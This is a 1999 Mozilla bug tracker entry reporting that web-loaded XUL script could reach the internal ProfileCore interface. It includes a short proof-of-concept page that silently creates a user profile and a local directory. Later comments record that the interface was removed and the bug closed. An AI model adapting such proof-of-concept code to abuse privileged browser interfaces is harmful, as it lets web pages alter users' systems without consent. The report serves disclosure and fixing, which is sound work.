Script may create profiles and local directories

VERIFIED WORKSFORME

Status

()

Core
Security
P3
major
VERIFIED WORKSFORME
19 years ago
18 years ago

People

(Reporter: joro, Assigned: Norris Boyd)

Tracking

Trunk
x86
Windows 95
Points:
---
Dependency tree / graph

Firefox Tracking Flags

(Not tracked)

Details

(URL)

(Reporter)

Description

19 years ago
Mozilla 5.0 M8 Win95 (guess all platforms) allows creating profiles and local
directories without user's knowledge.
For details, examine the XUL code:
-----------------------------prof1.xul-------------------------
<?xml version="1.0"?>
 <!DOCTYPE window>
 <window
   xmlns:html="http://www.w3.org/TR/REC-html40"
   xmlns:xul ="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
   title = "Creating profiles and local directories">
 <html:script>
   <![CDATA[

    // The profile and directory to be created
    var data="ProfileName=guninski%ProfileDir=C:\\guninskix%";

    var profileCore = XPAppCoresManager.Find("ProfileCore");
    if (!profileCore)
    {
		profileCore = new ProfileCore();
		if (profileCore) {
			profileCore.Init("ProfileCore");
		}
		else {
			dump("profile not created\n");
		}
	}

	if (profileCore) {
		profileCore.CreateNewProfile(data);
	}
   ]]>
  </html:script>

<html:h3> This page adds a user profile and creates a directory C:\guninskix.
<html:br>
</html:h3>
</window>
---------------------------------------------------------------
(Assignee)

Updated

19 years ago
Status: NEW → ASSIGNED
(Assignee)

Comment 1

19 years ago
The XPAppCoresManager shouldn't be accessible from web JavaScript. Is it?
(Reporter)

Comment 2

19 years ago
It is accessible from web JavaScript.
Check: http://www.nat.bg/~joro/mozilla/prof1.xul
Tested with M8 and build 1999080508
(Assignee)

Updated

19 years ago
Target Milestone: M11
(Assignee)

Updated

19 years ago
Blocks: 12633
(Assignee)

Updated

19 years ago
Depends on: 13021
(Assignee)

Comment 3

19 years ago
I now get an error from the XML parser.

Comment 4

19 years ago
Appcores are going away...(and I'm removing them myself since noone else seems
to want to)

I would just mark this invalid.
(Reporter)

Comment 5

19 years ago
I think this bug is fixed because the new profile manager uses XPConnect instead
of AppCore. Anyway I fixed the XML parser error and the new error is:
"JavaScript Error: ReferenceError: ProfileCore is not defined
"
(Assignee)

Updated

19 years ago
Status: ASSIGNED → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → WORKSFORME
(Assignee)

Comment 6

19 years ago
Now get the error

JavaScript Error: ReferenceError: ProfileCore is not defined

Comment 7

18 years ago
Verified worksforme.
Status: RESOLVED → VERIFIED

Comment 8

18 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.